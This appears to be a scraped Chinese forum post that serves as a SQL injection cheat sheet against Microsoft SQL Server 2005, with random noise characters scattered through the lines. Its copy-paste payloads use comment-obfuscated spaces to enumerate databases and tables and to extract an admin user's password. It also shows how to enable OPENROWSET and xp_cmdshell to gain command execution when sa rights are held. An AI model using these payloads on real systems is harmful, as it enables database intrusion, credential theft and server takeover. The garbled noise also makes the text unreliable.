, M) X6 x/ [3 T+ e$ b# H1 E, ~
8 ]$ M: [4 `( F8 h; O- s) X- ?; x3 y3 q- |% M! ]- N5 A$ H; d( Q) k
[Copy to clipboard]CODE:. f7 k; F" m9 S+ Y& y2 l: T
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--5 r. `" n/ ^. \( |
7 n7 ]& r' t' C& D! P' p! K3 S8 p9 J
爆表语句,somedb部份是所要列的数据库,红色数字1累加
% h. \) p {' d! @" X
" S, K6 D; r7 o5 f/ C5 D# ^0 z8 ^, b, A
[Copy to clipboard]CODE:# e: a0 X1 u9 Q7 g6 E; g" y
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
0 E7 k7 ]% d6 a) t6 Y' V
4 ~7 r! w. \4 |$ s; A$ |8 i4 a2 u爆字段语句,爆表admin里user='icerover'的密码段
3 c7 K# @! y/ J! k* v: z$ p5 B7 w; d
/ r8 Y' W4 N- S$ m[Copy to clipboard]CODE:
9 h1 p: K8 B. M% f. I0 _; I**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
~/ N6 |8 q$ A( q; }: Y
5 W/ G M3 l" f8 {/ J0 Nmssql2005默认没有开xp_cmdshell的,openrowset也不能用
' `/ z) ^( b# k' H- O如果是sa权限,可以这样来开启
. C7 B- Q, x# t: {$ S3 a/ ^2 k b开启openrowset
% z, g9 _$ k: |, n- |: d; e+ S* X& H' }, q j3 @$ H1 V
. O7 T1 G* t# o9 v6 W5 c
[Copy to clipboard]CODE:9 f3 `5 g. f8 b# { a( S3 q+ z
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;-- R8 w2 M7 a( Y5 F+ G$ L
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--6 R2 p+ ?9 e4 H% N( a
' P! w; i: B5 u3 ]" F( v, i3 h开启xp_cmdshell
: |9 [, y J5 a0 |! `( g* r. D. V8 v7 U o/ T2 l1 [
`) v% b9 B F7 H+ u
[Copy to clipboard]CODE:
9 I# z2 _) o0 e, k3 m4 J% x5 uEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
$ S; L" a) o0 H; u9 IEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
* b- I6 z: m$ n2 W$ W" t% F7 t: f/ ]( p: e# n; J# y* q
ok,over~~晚安
/ ?& v6 A! o# \- V" @ |